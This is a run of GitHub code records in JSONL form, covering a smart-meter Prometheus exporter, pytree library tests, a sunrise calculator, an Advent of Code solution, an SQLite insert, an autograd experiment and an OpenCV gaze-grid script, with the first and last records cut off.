self.serial.readline()\n            if len(p1data) == 0:\n                if p1data_line[0] == '/':\n                    p1data = p1data_line\n                else:\n                    pass\n            else:\n                p1data += p1data_line\n                if p1data_line[0] == '!':\n                    logging.debug('received raw p1data:\\n%s', p1data)\n                    return p1data\n                else:\n                    pass\n\n    def store(self, metrics):\n        \"\"\"expose metrics to prometheus\"\"\"\n        self.tariff1_delivered_reading_gauge.labels(\n            elec_eid=metrics.elec_eid()\n        ).set(metrics.tariff1_delivered_reading()[0])\n\n        self.tariff2_delivered_reading_gauge.labels(\n            elec_eid=metrics.elec_eid()\n        ).set(metrics.tariff2_delivered_reading()[0])\n\n        for tariff_indicator in [1, 2]:\n            self.power_delivered_gauge.labels(\n                elec_eid=metrics.elec_eid(),\n                tariff_indicator=tariff_indicator\n            ).set(metrics.power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n            self.l1_power_delivered_gauge.labels(\n                elec_eid=metrics.elec_eid(),\n                tariff_indicator=tariff_indicator\n            ).set(metrics.l1_power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n            self.l2_power_delivered_gauge.labels(\n                elec_eid=metrics.elec_eid(),\n                tariff_indicator=tariff_indicator\n            ).set(metrics.l2_power_delivered()[0] if tariff_indicator == metrics.tariff_indicator() else 0)\n\n            self.l3_power_delivered_gauge.labels(\n                elec_eid=metrics.elec_eid(),\n                tariff_indicator=tariff_indicator\n            ).set(metrics.l3_power_delivered()[0] if 
tariff_indicator == metrics.tariff_indicator() else 0)\n\n self.gas_delivered_reading_gauge.labels(\n gas_eid=metrics.elec_eid()\n ).set(metrics.gas_delivered_reading()[0])\n\n def run(self):\n \"\"\"receive p1 data and expose the data and again and again ...\"\"\"\n while True:\n self.store(P1DataMetrics(self.receive()))\n\n\nif __name__ == '__main__':\n def sigterm_handler(_signo, _stack_frame):\n \"\"\"When sysvinit sends the TERM signal, cleanup before exiting.\"\"\"\n logging.info('received signal %d, exiting...', _signo)\n logging.debug(_stack_frame)\n sys.exit(0)\n\n signal.signal(signal.SIGTERM, sigterm_handler)\n\n SERIAL = sys.argv[1]\n\n logging.info('running p1dataclient (%s)', SERIAL)\n P1DataClient(SERIAL).run()\n","repo_name":"projectx2-nl/slimmemeter","sub_path":"p1dataclient/p1dataclient.py","file_name":"p1dataclient.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8351120109","text":"from __future__ import annotations\n\nimport collections\nimport re\nimport pytest\nimport inspect\nfrom functools import wraps\nfrom contextlib import contextmanager\n\nimport pytreez as tree_util\nfrom pytreez import _process_pytree\n\n\ndef _dummy_func(*args, **kwargs):\n return\n\n\nATuple = collections.namedtuple(\"ATuple\", (\"foo\", \"bar\"))\n\nclass ANamedTupleSubclass(ATuple):\n pass\n\nclass AnObject(object):\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y and self.z == other.z\n\n def __hash__(self):\n return hash((self.x, self.y, self.z))\n\n def __repr__(self):\n return \"AnObject({},{},{})\".format(self.x, self.y, self.z)\n\ntree_util.register_pytree_node(AnObject, lambda o: ((o.x, o.y), o.z),\n lambda z, xy: AnObject(xy[0], xy[1], z))\n\n@tree_util.register_pytree_node_class\nclass Special:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"Special(x={}, y={})\".format(self.x, self.y)\n\n def tree_flatten(self):\n return ((self.x, self.y), None)\n\n @classmethod\n def tree_unflatten(cls, aux_data, children):\n return cls(*children)\n\n def __eq__(self, other):\n return type(self) is type(other) and (self.x, self.y) == (other.x, other.y)\n\n@tree_util.register_pytree_node_class\nclass FlatCache:\n def __init__(self, structured, *, leaves=None, treedef=None):\n if treedef is None:\n leaves, treedef = tree_util.tree_flatten(structured)\n self._structured = structured\n self.treedef = treedef\n self.leaves = leaves\n\n def __hash__(self):\n return hash(self.structured)\n\n def __eq__(self, other):\n return self.structured == other.structured\n\n def __repr__(self):\n return f\"FlatCache({self.structured!r})\"\n\n @property\n def structured(self):\n if self._structured is None:\n self._structured = tree_util.tree_unflatten(self.treedef, self.leaves)\n return self._structured\n\n def tree_flatten(self):\n return self.leaves, self.treedef\n\n @classmethod\n def tree_unflatten(cls, meta, data):\n if not tree_util.all_leaves(data):\n data, meta = tree_util.tree_flatten(tree_util.tree_unflatten(meta, data))\n return FlatCache(None, leaves=data, treedef=meta)\n\nTREES = (\n (None,),\n ((None,),),\n ((),),\n (([()]),),\n ((1, 2),),\n (((1, \"foo\"), [\"bar\", (3, None, 7)]),),\n ([3],),\n ([3, ATuple(foo=(3, ATuple(foo=3, bar=None)), bar={\"baz\": 34})],),\n ([AnObject(3, None, [4, \"foo\"])],),\n (Special(2, 3.),),\n ({\"a\": 1, \"b\": 2},),\n 
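# mapping subclasses, a namedtuple subclass, and FlatCache wrappers\n    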
(collections.OrderedDict([(\"foo\", 34), (\"baz\", 101), (\"something\", -42)]),),\n (collections.defaultdict(dict,\n [(\"foo\", 34), (\"baz\", 101), (\"something\", -42)]),),\n (ANamedTupleSubclass(foo=\"hello\", bar=3.5),),\n (FlatCache(None),),\n (FlatCache(1),),\n (FlatCache({\"a\": [1, 2]}),),\n)\n\n\nTREE_STRINGS = (\n \"PyTreeDef(None)\",\n \"PyTreeDef((None,))\",\n \"PyTreeDef(())\",\n \"PyTreeDef([()])\",\n \"PyTreeDef((*, *))\",\n \"PyTreeDef(((*, *), [*, (*, None, *)]))\",\n \"PyTreeDef([*])\",\n \"PyTreeDef([*, CustomNode(namedtuple[], [(*, \"\n \"CustomNode(namedtuple[], [*, None])), {'baz': \"\n \"*}])])\",\n \"PyTreeDef([CustomNode([[4, 'foo']], [*, None])])\",\n \"PyTreeDef(CustomNode([None], [*, *]))\",\n \"PyTreeDef({'a': *, 'b': *})\",\n)\n\n# pytest expects \"tree_util_test.ATuple\"\nSTRS = []\nfor tree_str in TREE_STRINGS:\n tree_str = re.escape(tree_str)\n tree_str = tree_str.replace(\"__main__\", \".*\")\n STRS.append(tree_str)\nTREE_STRINGS = STRS\n\nLEAVES = (\n (\"foo\",),\n (0.1,),\n (1,),\n (object(),),\n)\n\n\ndef check(tree):\n leaves, td = tree_util.tree_flatten(tree)\n tree2 = td.unflatten(leaves)\n assert tree_util.tree_leaves(tree) == tree_util.tree_leaves(tree2)\n assert tree == tree2\n return leaves, td\n\n\n@tree_util.register_pytree_node_class\nclass Box:\n def __init__(self, data):\n self.data = data\n def tree_flatten(self):\n leaves, treedef = tree_util.tree_flatten(self.data)\n return (leaves, treedef)\n @classmethod\n def tree_unflatten(cls, treedef: tree_util.PyTreeDef, leaves):\n data = treedef.unflatten(leaves)\n return cls(data)\n def __eq__(self, other: Box):\n if not isinstance(other, self.__class__):\n return False\n self_leaves, self_treedef = self.tree_flatten()\n other_leaves, other_treedef = other.tree_flatten()\n if self_treedef != other_treedef:\n return False\n a = self_leaves\n b = other_leaves\n if len(a) != len(b):\n return False\n for i in range(len(a)):\n x, y = a[i], b[i]\n if x != y:\n return False\n return True\n def __str__(self):\n return str(self.data)\n def __repr__(self):\n return self.__class__.__module__ + '.' 
+ self.__class__.__name__ + '(' + str(self) + ')'\n\n\ndef test_register_pytree_node_class():\n check([1,2,(3,4,{'a': 42})])\n check(Box([1,2,(3,4,{'a': 42, 'b': [1,Box([2,{'c': Box(3)}])]})]))\n\n\ndef test_flatten_up_to():\n _, tree = tree_util.tree_flatten([(1, 2), None, ATuple(foo=3, bar=7)])\n out = tree.flatten_up_to([({\n \"foo\": 7\n }, (3, 4)), None, ATuple(foo=(11, 9), bar=None)])\n assert out == [{\"foo\": 7}, (3, 4), (11, 9), None]\n\n\nclass parameterized:\n @staticmethod\n def parameters(*choices):\n if len(choices) == 1 and isinstance(choices[0], list):\n choices = choices[0]\n def wrapper(fn):\n argc = [len(argv) for argv in choices]\n for i in range(len(argc) - 1):\n a = argc[i]\n b = argc[i+1]\n assert a == b\n argc = argc[0]\n args = [arg.name for arg in inspect.signature(fn).parameters.values()]\n if len(args) > 0 and args[0] == 'self':\n args.pop(0)\n assert len(args) == argc\n argvs = list(choices)\n argvs = [x[0] if isinstance(x, tuple) and len(x) == 1 else x for x in argvs]\n return pytest.mark.parametrize(','.join(args), argvs)(fn)\n return wrapper\n\n\nclass TestCase:\n @staticmethod\n def skipTest(reason):\n return\n\n @staticmethod\n def assertEqual(a, b):\n assert a == b\n\n @staticmethod\n def assertTrue(a):\n assert a == True\n\n @staticmethod\n def assertFalse(a):\n assert a == False\n\n @staticmethod\n def assertHashable(a):\n try:\n {a: True}\n except TypeError:\n assert False, \"Not hashable\"\n\n\n @staticmethod\n def assertRegex(string, pattern, literal=False):\n if literal:\n pattern = re.escape(pattern)\n expected_regex = re.compile(pattern)\n assert expected_regex.search(string)\n\n @classmethod\n @contextmanager\n def assertRaisesRegex(cls, exn, pattern):\n try:\n yield\n except exn as e:\n cls.assertRegex(str(e), pattern)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtrip(self, inputs):\n xs, tree = tree_util.tree_flatten(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n self.assertEqual(actual, inputs)\n self.assertHashable(tree)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtripWithFlattenUpTo(self, inputs):\n _, tree = tree_util.tree_flatten(inputs)\n xs = tree.flatten_up_to(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n self.assertEqual(actual, inputs)\n\n @parameterized.parameters(\n (tree_util.Partial(_dummy_func),),\n (tree_util.Partial(_dummy_func, 1, 2),),\n (tree_util.Partial(_dummy_func, x=\"a\"),),\n (tree_util.Partial(_dummy_func, 1, 2, 3, x=4, y=5),),\n )\n def testRoundtripPartial(self, inputs):\n xs, tree = tree_util.tree_flatten(inputs)\n actual = tree_util.tree_unflatten(tree, xs)\n # functools.partial does not support equality comparisons:\n # https://stackoverflow.com/a/32786109/809705\n self.assertEqual(actual.func, inputs.func)\n self.assertEqual(actual.args, inputs.args)\n self.assertEqual(actual.keywords, inputs.keywords)\n\n @parameterized.parameters(*(TREES + LEAVES))\n def testRoundtripViaBuild(self, inputs):\n xs, tree = _process_pytree(tuple, inputs)\n actual = tree_util.build_tree(tree, xs)\n self.assertEqual(actual, inputs)\n\n def testChildren(self):\n _, tree = tree_util.tree_flatten(((1, 2, 3), (4,)))\n _, c0 = tree_util.tree_flatten((0, 0, 0))\n _, c1 = tree_util.tree_flatten((7,))\n self.assertEqual([c0, c1], tree.children())\n\n def testFlattenUpTo(self):\n _, tree = tree_util.tree_flatten([(1, 2), None, ATuple(foo=3, bar=7)])\n out = tree.flatten_up_to([({\n \"foo\": 7\n }, (3, 4)), None, ATuple(foo=(11, 9), bar=None)])\n self.assertEqual(out, [{\"foo\": 7}, 
(3, 4), (11, 9), None])\n\n def testTreeMultimap(self):\n x = ((1, 2), (3, 4, 5))\n y = (([3], None), ({\"foo\": \"bar\"}, 7, [5, 6]))\n out = tree_util.tree_multimap(lambda *xs: tuple(xs), x, y)\n self.assertEqual(out, (((1, [3]), (2, None)),\n ((3, {\"foo\": \"bar\"}), (4, 7), (5, [5, 6]))))\n\n def testTreeMultimapWithIsLeafArgument(self):\n x = ((1, 2), [3, 4, 5])\n y = (([3], None), ({\"foo\": \"bar\"}, 7, [5, 6]))\n out = tree_util.tree_multimap(lambda *xs: tuple(xs), x, y,\n is_leaf=lambda n: isinstance(n, list))\n self.assertEqual(out, (((1, [3]), (2, None)), (([3, 4, 5], ({\"foo\": \"bar\"}, 7, [5, 6])))))\n\n def testFlattenIsLeaf(self):\n x = [(1, 2), (3, 4), (5, 6)]\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: False)\n self.assertEqual(leaves, [1, 2, 3, 4, 5, 6])\n leaves, _ = tree_util.tree_flatten(\n x, is_leaf=lambda t: isinstance(t, tuple))\n self.assertEqual(leaves, x)\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: isinstance(t, list))\n self.assertEqual(leaves, [x])\n leaves, _ = tree_util.tree_flatten(x, is_leaf=lambda t: True)\n self.assertEqual(leaves, [x])\n\n y = [[[(1,)], [[(2,)], {\"a\": (3,)}]]]\n leaves, _ = tree_util.tree_flatten(\n y, is_leaf=lambda t: isinstance(t, tuple))\n self.assertEqual(leaves, [(1,), (2,), (3,)])\n\n @parameterized.parameters(*TREES)\n def testRoundtripIsLeaf(self, tree):\n xs, treedef = tree_util.tree_flatten(\n tree, is_leaf=lambda t: isinstance(t, tuple))\n recon_tree = tree_util.tree_unflatten(treedef, xs)\n self.assertEqual(recon_tree, tree)\n\n @parameterized.parameters(*TREES)\n def testAllLeavesWithTrees(self, tree):\n leaves = tree_util.tree_leaves(tree)\n self.assertTrue(tree_util.all_leaves(leaves))\n self.assertFalse(tree_util.all_leaves([tree]))\n\n @parameterized.parameters(*LEAVES)\n def testAllLeavesWithLeaves(self, leaf):\n self.assertTrue(tree_util.all_leaves([leaf]))\n\n @parameterized.parameters(*TREES)\n def testCompose(self, tree):\n treedef = tree_util.tree_structure(tree)\n inner_treedef = tree_util.tree_structure([\"*\", \"*\", \"*\"])\n composed_treedef = treedef.compose(inner_treedef)\n expected_leaves = treedef.num_leaves * inner_treedef.num_leaves\n self.assertEqual(composed_treedef.num_leaves, expected_leaves)\n expected_nodes = ((treedef.num_nodes - treedef.num_leaves) +\n (inner_treedef.num_nodes * treedef.num_leaves))\n self.assertEqual(composed_treedef.num_nodes, expected_nodes)\n leaves = [1] * expected_leaves\n composed = tree_util.tree_unflatten(composed_treedef, leaves)\n self.assertEqual(leaves, tree_util.tree_leaves(composed))\n\n @parameterized.parameters(*TREES)\n def testTranspose(self, tree):\n outer_treedef = tree_util.tree_structure(tree)\n if not outer_treedef.num_leaves:\n return self.skipTest(\"Skipping empty tree\")\n inner_treedef = tree_util.tree_structure([1, 1, 1])\n nested = tree_util.tree_map(lambda x: [x, x, x], tree)\n actual = tree_util.tree_transpose(outer_treedef, inner_treedef, nested)\n self.assertEqual(actual, [tree, tree, tree])\n\n def testTransposeMismatchOuter(self):\n tree = {\"a\": [1, 2], \"b\": [3, 4]}\n outer_treedef = tree_util.tree_structure({\"a\": 1, \"b\": 2, \"c\": 3})\n inner_treedef = tree_util.tree_structure([1, 2])\n with self.assertRaisesRegex(TypeError, \"Mismatch\"):\n tree_util.tree_transpose(outer_treedef, inner_treedef, tree)\n\n def testTransposeMismatchInner(self):\n tree = {\"a\": [1, 2], \"b\": [3, 4]}\n outer_treedef = tree_util.tree_structure({\"a\": 1, \"b\": 2})\n inner_treedef = tree_util.tree_structure([1, 2, 3])\n 
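# the inner treedef expects three children per leaf, but each list in the tree holds only two\n    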
with self.assertRaisesRegex(TypeError, \"Mismatch\"):\n tree_util.tree_transpose(outer_treedef, inner_treedef, tree)\n\n def testTransposeWithCustomObject(self):\n outer_treedef = tree_util.tree_structure(FlatCache({\"a\": 1, \"b\": 2}))\n inner_treedef = tree_util.tree_structure([1, 2])\n expected = [FlatCache({\"a\": 3, \"b\": 5}), FlatCache({\"a\": 4, \"b\": 6})]\n actual = tree_util.tree_transpose(outer_treedef, inner_treedef,\n FlatCache({\"a\": [3, 4], \"b\": [5, 6]}))\n self.assertEqual(expected, actual)\n\n @parameterized.parameters([(*t, s) for t, s in zip(TREES, TREE_STRINGS)])\n def testStringRepresentation(self, tree, correct_string):\n \"\"\"Checks that the string representation of a tree works.\"\"\"\n treedef = tree_util.tree_structure(tree)\n self.assertRegex(str(treedef), correct_string)","repo_name":"shawwn/pytreez","sub_path":"tests/test_pytreez.py","file_name":"test_pytreez.py","file_ext":"py","file_size_in_byte":13975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3074959358","text":"from collections import Counter\n\ndef ensure_lowercase(sequence):\n '''\ntakes an input string and returns an all lower-case \nversion of the string.\n '''\n try: # try ... except\n output = sequence.lower()\n except (AttributeError, ValueError) as e:\n print(\"couldn't convert input sequence to lower case.\")\n raise\n return output\n\ndef count_letters(string):\n '''\ncount the letters in a string and print out the results. \n '''\n letter_counts = Counter(string)\n print('letter counts for', string)\n for letter, count in letter_counts.items():\n print('{}\\t{}'.format(letter, count))\n\n","repo_name":"tobyhodges/software-carpentry-sep2016","sub_path":"intro_python/seqops.py","file_name":"seqops.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1433852354","text":"import math\nimport datetime\n\nclass Sunlight(object):\n def __init__(self, julian_date, longitude, latitude):\n self.julian_date = julian_date\n self.longitude = longitude\n self.latitude = latitude\n \n def calc_current_julian_day(self):\n self.n = self.julian_date - 2451545.0 + 0.0008\n return self.n\n\n def calc_mean_solar_time(self):\n self.mean_solar_time = self.n - self.longitude/360\n return self.mean_solar_time\n \n def calc_solar_mean_anomaly(self):\n self.solar_mean_anomaly = (357.5291 + 0.98560028*self.mean_solar_time)%360\n return self.solar_mean_anomaly\n\n def calc_equation_of_the_center(self):\n self.equation_of_the_center = 1.9148*math.sin(math.radians(self.solar_mean_anomaly)) \\\n + 0.0200*math.sin(math.radians(2*self.solar_mean_anomaly)) \\\n + 0.0003*math.sin(math.radians(3*self.solar_mean_anomaly))\n return self.equation_of_the_center\n\n def calc_ecliptic_longitude(self):\n self.ecliptic_longitude = (self.solar_mean_anomaly + self.equation_of_the_center + 180 + 102.9372)%360\n return self.ecliptic_longitude\n\n def calc_solar_transit(self):\n self.solar_transit = 2451545.0 + self.mean_solar_time \\\n + 0.0053*math.sin(math.radians(self.solar_mean_anomaly)) \\\n - 0.0069*math.sin(math.radians(2*self.ecliptic_longitude))\n return self.solar_transit\n\n def calc_declination_of_the_sun(self):\n sin_declination_of_the_sun = math.sin(math.radians(self.ecliptic_longitude))*math.sin(math.radians(23.44))\n self.declination_of_the_sun = math.degrees(math.asin(sin_declination_of_the_sun))\n return self.declination_of_the_sun\n\n def 
calc_hour_angle(self):\n numerator = math.sin(math.radians(-0.83)) \\\n - math.sin(math.radians(self.latitude))*math.sin(math.radians(self.declination_of_the_sun))\n denominator = math.cos(math.radians(self.latitude))*math.cos(math.radians(self.declination_of_the_sun))\n cos_hour_angle = numerator/denominator\n self.hour_angle = math.degrees(math.acos(cos_hour_angle))\n return self.hour_angle\n\n def calc_sunrise(self):\n self.julian_date_of_sunrise = self.solar_transit - self.hour_angle/360\n return self.julian_date_of_sunrise\n\n def calc_sunset(self):\n self.julian_date_of_sunset = self.solar_transit + self.hour_angle/360\n return self.julian_date_of_sunset\n\n def run(self):\n self.calc_current_julian_day()\n self.calc_mean_solar_time()\n self.calc_solar_mean_anomaly()\n self.calc_equation_of_the_center()\n self.calc_ecliptic_longitude()\n self.calc_solar_transit()\n self.calc_declination_of_the_sun()\n self.calc_hour_angle()\n self.calc_sunrise()\n self.calc_sunset()\n return self.julian_date_of_sunrise, self.julian_date_of_sunset\n\nclass Time(object):\n def __init__(self):\n self.update()\n \n def update(self):\n self.date = datetime.datetime.now(datetime.timezone.utc)\n self.year = self.date.year\n self.month = self.date.month\n self.day = self.date.day\n self.hour = self.date.hour\n self.minute = self.date.minute\n self.second = self.date.second\n self.fix_year_and_month()\n\n def fix_year_and_month(self):\n if self.month == 1 or self.month == 2:\n self.month += 12\n self.year -= 1\n\n def julian(self):\n self.julian_date = int(365.25*self.year) \\\n + int(self.year/400) \\\n - int(self.year/100) \\\n + int(30.59*(self.month-2)) \\\n + self.day \\\n + 1721088.5 \\\n + self.hour/24 \\\n + self.minute/1440 \\\n + self.second/86400\n return self.julian_date\n\ndef main():\n julian_date = Time().julian()\n print(julian_date)\n\n sunlight = Sunlight(julian_date, 135, 34.39)\n sunlight.run()\n print(sunlight.julian_date_of_sunrise)\n print(sunlight.julian_date_of_sunset)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kumagaimasahito/Pico","sub_path":"sunlight.py","file_name":"sunlight.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70164388674","text":"import os\nimport requests\n\nSHEETY_ENDPOINT = os.environ.get(\"SHEETY_ENDPOINT\")\n\n\n# This class is responsible for talking to the Google sheet\nclass DataManager:\n def get_destination_data(self):\n response = requests.get(url=SHEETY_ENDPOINT)\n response.raise_for_status()\n return response.json()[\"prices\"]\n\n def update_iata_code(self, row_id, iata_code):\n body = {\n \"price\": {\n \"iataCode\": iata_code\n }\n }\n response = requests.put(f\"{SHEETY_ENDPOINT}/{row_id}\", json=body)\n response.raise_for_status()\n","repo_name":"RobertoLJr/100-days-of-python","sub_path":"day-039-project-flight-deal-finder/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11750144801","text":"from pathlib import Path\r\n\r\n\r\nif __name__ == '__main__':\r\n def neighbours(a):\r\n return [(a[0] + orientation[1][di][0], a[1] + orientation[1][di][1]) for di in range(0, len(orientation[1]))]\r\n dataset = [i for i in Path('../input/input_2020_24.txt').read_text().split('\\n')]\r\n orientation = [['e', 'se', 'sw', 'w', 'nw', 'ne'], [[2, 0], [1, 1], [-1, 1], [-2, 0], [-1, -1], [1, -1]]]\r\n 
floor = {}\r\n    for tile in range(0, len(dataset)):\r\n        position = [0, 0]\r\n        char = 0\r\n        while char < len(dataset[tile]):\r\n            if dataset[tile][char] not in ['e', 'w']:\r\n                way = dataset[tile][char] + dataset[tile][char + 1]\r\n                char += 2\r\n            else:\r\n                way = dataset[tile][char]\r\n                char += 1\r\n            for dim in range(0, 2):\r\n                position[dim] += orientation[1][orientation[0].index(way)][dim]\r\n        if (position[0], position[1]) in floor.keys():\r\n            del floor[(position[0], position[1])]\r\n        else:\r\n            floor[(position[0], position[1])] = True\r\n    print('Answer part 1 = {:d} '.format(len(floor.keys())), len(floor.keys()) == 512)\r\n    for day in range(0, 100):\r\n        shadow = floor.copy()\r\n        for tile_1 in floor.keys():\r\n            neighbours_counter = 0\r\n            for tile_2 in floor.keys():\r\n                neighbours_counter += (tile_2 in neighbours(tile_1))\r\n            if neighbours_counter > 2 or neighbours_counter == 0:\r\n                del shadow[tile_1]\r\n            for tile_2 in neighbours(tile_1):\r\n                if tile_2 not in floor.keys():\r\n                    neighbours_counter = 0\r\n                    for tile_3 in neighbours(tile_2):\r\n                        neighbours_counter += (tile_3 in floor.keys())\r\n                    if neighbours_counter == 2:\r\n                        shadow[tile_2] = True\r\n        floor = shadow.copy()\r\n        print(day, len(floor.keys()))\r\n    print('Answer part 2 = {:d} '.format(len(floor.keys())), len(floor.keys()) == 4120)\r\n","repo_name":"osterbek/adventofcode","sub_path":"bin/2020_day_24.py","file_name":"2020_day_24.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"8170263209","text":"import autograd.numpy as np \nfrom autograd import grad\n\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(1,2, figsize = [8,4])\n\nn = 20\nes = 20\nlr = .001\nups = 20\np = 2\n# x,y = np.random.multivariate_normal(\n# \t[.5,.5],\n# \t[ [1,.9],\n# \t  [.9,1] ],\n# \tn,\n# ).T\nx = np.linspace(0.01,2,n)\ny = (x * 1 + 0) ** (p)\nax[0].scatter(x,y)\n\n## Model\ndef fl(args):\n\tw,x,b,y,w2,b2,h = args\n\ty_ = ((x * w + b) + (h * w2 + b2)) ** (p)  # second bias is b2; with b here, the b2 gradient update below was a no-op\n\th = (x * w + b)  # note: this rebinding is local to fl; the outer h is never updated\n\treturn np.sum((y - y_) ** 2)\n\ng = grad(fl)\n\n\n## Train\nw, w2, b, b2 = 0.01, .01, 0.0, .0\nh = 0.0\nn_ord = []\nfor e in range(es):\n\tfor i in range(n):\n\t\tgrads = g([w,x[i],b,y[i],w2,b2,h])\n\t\tfor u in range(ups):\n\t\t\tw -= lr * grads[0] \n\t\t\tw2 -= lr * grads[-3]\n\t\t\tb -= lr * grads[2]\n\t\t\tb2 -= lr * grads[-2]\n\tn_ord.append(fl([w,x,b,y,w2,b2,h]))\n\nax[0].plot(\n\tx,\n\t(x * w + b) ** (p)\n)\nax[1].plot(n_ord, alpha = .5, linewidth = 3)\n\n\n## Train rand\nw, w2, b, b2 = 0.01, .01, 0.0, .0\nh = 0.0\nn_rand = []\nfor e in range(es):\n\tfor i in np.random.permutation(n):\n\t\tgrads = g([w,x[i],b,y[i],w2,b2,h])\n\t\tfor u in range(ups):\n\t\t\tw -= lr * grads[0]\n\t\t\tw2 -= lr * grads[-3]\n\t\t\tb -= lr * grads[2]\n\t\t\tb2 -= lr * grads[-2]\n\tn_rand.append(fl([w,x,b,y,w2,b2,h]))\n\nax[0].plot(\n\tx,\n\t(x * w + b) ** (p)\n)\nax[1].plot(n_rand, alpha = .5, linewidth = 3)\n\n\n\n\nplt.savefig('test.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mw3i/prelims","sub_path":"Shared Explanatory Frameworks for Function Learning and Category Learning in Humans/simulations/_/mlc test/mlc rr.py","file_name":"mlc rr.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"10145043316","text":"import sqlite3\nconn = sqlite3.connect('test.db')\n\nsql = '''\ninsert into saram(id, name, age)\nvalues(?,?,?)\n'''\nc = conn.cursor()\nc.execute(sql, 
('lee','gilsun',21))\nc.close()\n\nconn.commit()\nconn.close()","repo_name":"comstudy21joon/python","sub_path":"ch10_file_db/ch10ex13_insert_tuple.py","file_name":"ch10ex13_insert_tuple.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23578556437","text":"import numpy as np\nimport cv2\nimport threading\nimport datetime\nimport pickle\n\nfrom prompt_toolkit.keys import Keys\nimport gi.repository\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\nclass cell:\n def __init__(self):\n self.width = 170 # mm\n self.height = 230 # mm\n self.center = (0, 0)\n self.color = (0, 0, 255) # red\n self.thickness = 2\n def draw(self, image, ratio = 1):\n start_point = (int((self.center[0]-self.width/2)*ratio), int((self.center[1]-self.height/2)*ratio))\n end_point = (int((self.center[0]+self.width/2)*ratio), int((self.center[1]+self.height/2)*ratio))\n image = cv2.rectangle(image, start_point, end_point, self.color, self.thickness)\n return image\n def put_index(self, image, stridx, ratio = 1):\n FONT, FONT_SCALE, FONT_THICKNESS = cv2.FONT_HERSHEY_SIMPLEX, 1, 1\n (label_width, label_height), baseline = cv2.getTextSize(str(stridx), FONT, FONT_SCALE, FONT_THICKNESS)\n cv2.putText(image, str(stridx),(int(self.center[0]*ratio - label_width / 2),\n int(self.center[1]*ratio + label_height / 2)),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1, cv2.LINE_AA)\n def fill(self, image, ratio):\n start_x, start_y = int((self.center[0] - self.width / 2)*ratio), int((self.center[1] - self.height / 2)*ratio)\n sor = np.ones((int(self.height*ratio), int(self.width*ratio), 3), np.uint8) * 255 # square of regard\n image[start_y:start_y + sor.shape[0], start_x:start_x + sor.shape[1]] = sor\n return image\n\nclass board:\n def __init__(self):\n self.num = 6 # 6x6 grid\n self.width = 1020 # mm\n self.height = 1380 # mm\n self.grid_cell = []\n self.cam_loc = (self.width/2, 550)#254) # location of camera on board\n for idx in range(0, self.num**2):\n cell_idx = cell()\n cell_idx.center = (cell_idx.width * (idx % self.num) + cell_idx.width / 2,\n cell_idx.height * int(idx / self.num) + cell_idx.height / 2)\n self.grid_cell.append(cell_idx)\n # initiate to display virtual board on screen with ratio\n display = Gdk.Display.get_default()\n screen = display.get_default_screen()\n default_screen = screen.get_default()\n screen_height = default_screen.get_height()\n self.create_visual(screen_height)\n\n def create_visual(self, monitor_height, ratio = 0.6): # ratio on monitor height\n h_pixels = int(ratio * monitor_height)\n w_pixels = int(ratio * monitor_height * (self.width / self.height)) # 102 / 138\n background = np.zeros((h_pixels, w_pixels, 3)) # 3channel\n ratio = (h_pixels / self.height)\n for idx in range(0, len(self.grid_cell)):\n self.grid_cell[idx].draw(background, ratio) # 1 mm = h/1380\n self.grid_cell[idx].put_index(background, idx+1, ratio)\n self.background = background\n self.ratio = ratio\n\n def visual_ror(self, idx):\n image = self.background.copy()\n cam_x = self.cam_loc[0]-self.grid_cell[idx].center[0]\n cam_y = self.grid_cell[idx].center[1]-self.cam_loc[1]\n return self.grid_cell[idx].fill(image, self.ratio), (cam_x, cam_y)\n\n def visual_ror_xy(self, x_hat, y_hat): # region of regard\n cell_x = self.cam_loc[0] - x_hat\n cell_y = self.cam_loc[1] + y_hat\n w, h = self.grid_cell[0].width, self.grid_cell[0].height\n cell_fill = int(cell_x/w) + (int(cell_y/h))*6\n\n if cell_fill < 0 or 
